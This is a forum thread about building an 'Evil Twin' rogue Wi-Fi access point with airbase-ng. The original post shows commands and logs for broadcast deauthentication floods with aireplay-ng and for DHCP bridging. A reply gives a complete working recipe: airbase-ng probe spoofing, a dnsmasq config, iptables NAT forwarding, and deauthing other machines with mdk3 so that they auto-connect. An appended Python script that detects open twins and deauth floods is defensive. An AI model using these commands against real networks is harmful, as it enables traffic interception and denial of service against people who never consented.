
Airbase-ng AP doesn't let my victim connect


asciighost


I have been working around the Evil Twin Airbase-ng for quite a while and I am unable to get my victim PC, which is my other Windows 10 machine, to connect. It did connect to the AP once (rarely), and when it did it had no internet connection, which has kept me up for some time. I am going to post the process I have performed; please go through it and guide me through the issue.

Note: I have tried iptables and echo 1; it didn't help.

Setting up USB Adapter TP-LINK TL-WN722N Version 1 to monitor mode
airmon-ng start wlan0

Checking for background processes that can interfere with the work
airmon-ng check wlan0mon (assigned new name)

Setting up the Fake AP
airbase-ng -a 72:02:71:73:0D:B6 --essid Ryan -c 1 wlan0mon
17:19:25 Created tap interface at0
17:19:25 Trying to set MTU on at0 to 1500
17:19:25 Trying to set MTU on wlan0mon to 1800
17:19:25 Access Point with BSSID 72:02:71:73:0D:B6 started.
17:19:40 Client D0:13:FD:07:79:07 associated (WPA2;CCMP) to ESSID: "Ryan"
17:19:41 Client 20:16:D8:F4:0D:98 associated (WPA2;CCMP) to ESSID: "Ryan"
17:19:57 Client 20:16:D8:F4:0D:98 associated (unencrypted) to ESSID: "Ryan"
17:20:03 Client 20:16:D8:F4:0D:98 associated (unencrypted) to ESSID: "Ryan"

 

Deauthorizing clients on another terminal

aireplay-ng -0 0 -a 72:02:71:73:0D:B6 wlan0mon
17:22:11 Waiting for beacon frame (BSSID: 72:02:71:73:0D:B6) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
17:22:11 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:11 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:12 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:12 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:13 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:13 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:14 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:14 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:15 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6

Installing DHCP server
apt-get install isc-dhcp-server
Reading package lists... Done
Building dependency tree
Reading state information... Done
isc-dhcp-server is already the newest version (4.3.5-3+b1).
The following packages were automatically installed and are no longer required:
casefile dconf-editor dconf-tools dissy gir1.2-nm-1.0 libbind9-140
libblas-common libcdio-cdda1 libcdio-paranoia1 libcdio13 libdns162 libemu2
libfwupd1 libgom-1.0-common libgtkspell3-3-0 libhttp-parser2.1 libisc160
libisccfg140 libllvm3.9 liblouis12 liblwgeom-2.3-0 libmozjs-24-0
libopencv-calib3d2.4v5 libopencv-core2.4v5 libopencv-features2d2.4v5
libopencv-flann2.4v5 libopencv-highgui2.4-deb0 libopencv-imgproc2.4v5
libopencv-objdetect2.4v5 libopencv-video2.4v5 libpython3.5
libpython3.5-minimal libpython3.5-stdlib libqcustomplot1.3
libqgis-core2.14.18 libqgis-gui2.14.18 libqgis-networkanalysis2.14.18
libqgispython2.14.18 libradare2-1.6 libtracker-control-1.0-0
libtracker-miner-1.0-0 libtracker-sparql-1.0-0 libva-drm1 libva-x11-1 libva1
maltegoce peepdf python-brotlipy python-pylibemu python-rsvg python-unicorn
python3.5 python3.5-minimal tcpd
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 30 not upgraded.

Configuring nano /etc/dhcp/dhcpd.conf

authoritative;
subnet 192.168.1.0 netmask 255.255.255.0
{

option broadcast-address 192.168.1.255;
option routers 192.168.1.1;
option domain-name-servers 8.8.8.8;
range 192.168.1.10 192.168.1.200;
default-lease-time 600;
max-lease-time 7200;

 

}

Installing bridging utilities

apt-get install bridge-utils
Reading package lists... Done
Building dependency tree
Reading state information... Done
bridge-utils is already the newest version (1.5-14).
0 upgraded, 0 newly installed, 0 to remove and 30 not upgraded.

Bridging interface
root@kali:~# brctl addbr evil # name of the bridge I made
root@kali:~# brctl addif evil eth0 # my ethernet connection
root@kali:~# brctl addif evil at0
root@kali:~# ifconfig at0 0.0.0.0 up
root@kali:~# ifconfig evil up

Starting DHCP server
root@kali:~# systemctl start smbd.service
root@kali:~# dhclient evil

root@kali:~# service isc-dhcp-server restart
root@kali:~# service isc-dhcp-server status
● isc-dhcp-server.service - LSB: DHCP server
   Loaded: loaded (/etc/init.d/isc-dhcp-server; generated; vendor preset: disabled)
   Active: active (running) since Wed 2017-12-06 17:32:35 EST; 6s ago
     Docs: man:systemd-sysv-generator(8)
  Process: 2049 ExecStart=/etc/init.d/isc-dhcp-server start (code=exited, status=0/SUCCESS)
    Tasks: 1 (limit: 4915)
   CGroup: /system.slice/isc-dhcp-server.service
           └─2061 /usr/sbin/dhcpd -4 -q -cf /etc/dhcp/dhcpd.conf eth0

Dec 06 17:32:33 kali systemd[1]: Starting LSB: DHCP server...
Dec 06 17:32:33 kali isc-dhcp-server[2049]: Launching IPv4 server only.
Dec 06 17:32:33 kali dhcpd[2060]: Wrote 11 leases to leases file.
Dec 06 17:32:33 kali dhcpd[2060]: Multiple interfaces match the same subnet: eth0 evil
Dec 06 17:32:33 kali dhcpd[2060]: Multiple interfaces match the same shared network: eth0 evil
Dec 06 17:32:33 kali dhcpd[2061]: Server starting service.
Dec 06 17:32:35 kali isc-dhcp-server[2049]: Starting ISC DHCPv4 server: dhcpd.
Dec 06 17:32:35 kali systemd[1]: Started LSB: DHCP server.

 

/etc/init.d/isc-dhcp-server start
[ ok ] Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service.

IP gateway

root@kali:~# route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.1.1 0.0.0.0 UG 100 0 0 eth0
0.0.0.0 192.168.1.1 0.0.0.0 UG 600 0 0 wlan0
192.168.1.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0
192.168.1.0 0.0.0.0 255.255.255.0 U 600 0 0 wlan0

Link to comment
Share on other sites

I use airbase-ng as a quick generic hotspot; it works with almost any wifi card. airbase-ng can also be used to spoof all probe requests with the use of -P -c 30.

 

Let's assume you have 2 devices.

 

One device is simply your internet source and the second device will be your evil hotspot.

 

I will assume you're already connected to the internet with device 1. It can be a wifi connection or Ethernet (eth0 in this example).

 

echo 'interface=at0' > /etc/dnsmasq.conf
echo 'dhcp-range=192.168.69.50,192.168.69.150,12h' >> /etc/dnsmasq.conf

airmon-ng start wlan0

airbase-ng -P -c 30 wlan0mon

[Open new console]

ifconfig at0 up 192.168.69.1

dnsmasq

 

iptables --flush && iptables --table nat --flush && iptables --delete-chain && iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT

echo 1 > /proc/sys/net/ipv4/ip_forward

 

You will need to change eth0 to the proper internet device name.

At this point, if you check ifconfig, you should see at0 has an IP address of 192.168.69.1 and you should have 2 processes running (airbase-ng and dnsmasq).

You can now deauth other machines (I would use mdk3 for deauth). If the machine is outdated enough it will auto-connect to your airbase-ng, assuming that signal strength is higher.

Edit: you may also need to run service network-manager stop.

Edited by i8igmac
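
Seen from the monitoring side, the setup in this thread leaves two over-the-air signals: an open network reusing the name of a WPA2 one (the association log shows "Ryan" as WPA2;CCMP and then unencrypted) and a steady stream of broadcast deauthentication frames. The following is an added example, not part of either post, that flags both; the observation tuples, thresholds and function name are assumptions, and the sample data is constructed.

```python
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"

def find_twin_indicators(beacons, deauths, burst=5, window=3.0):
    """beacons: (essid, bssid, security); deauths: (time_s, bssid, destination)."""
    findings = []
    seen = defaultdict(set)
    for essid, bssid, security in beacons:
        seen[essid].add((bssid.lower(), security))
    for essid in sorted(seen):
        # One network name advertised both protected and open: the open
        # entry is the candidate twin, even if it reuses the real BSSID.
        if len({sec for _, sec in seen[essid]}) > 1:
            for bssid, sec in sorted(seen[essid]):
                if sec == "OPEN":
                    findings.append(("open-twin", essid, bssid))
    times = defaultdict(list)
    for ts, bssid, dst in deauths:
        if dst.lower() == BROADCAST:
            times[bssid.lower()].append(ts)
    for bssid in sorted(times):
        stamps = sorted(times[bssid])
        # Flag `burst` broadcast deauths for one BSSID within `window` seconds.
        for i in range(len(stamps) - burst + 1):
            if stamps[i + burst - 1] - stamps[i] <= window:
                findings.append(("deauth-flood", None, bssid))
                break
    return findings

# Constructed sample observations, not captured traffic. The ESSID and BSSID
# are the ones in the post; that the real network is WPA2 is an assumption.
SAMPLE_BEACONS = [
    ("Ryan", "72:02:71:73:0D:B6", "WPA2"),
    ("Ryan", "72:02:71:73:0D:B6", "OPEN"),
    ("Cafe", "00:11:22:33:44:66", "OPEN"),
]
# Two broadcast deauths per second, the rate visible in the aireplay-ng output.
SAMPLE_DEAUTHS = [(i * 0.5, "72:02:71:73:0D:B6", BROADCAST) for i in range(9)]

if __name__ == "__main__":
    for finding in find_twin_indicators(SAMPLE_BEACONS, SAMPLE_DEAUTHS):
        print(finding)
```

A network that is legitimately open everywhere, such as "Cafe" in the sample, is not flagged; only a name seen with mixed security is.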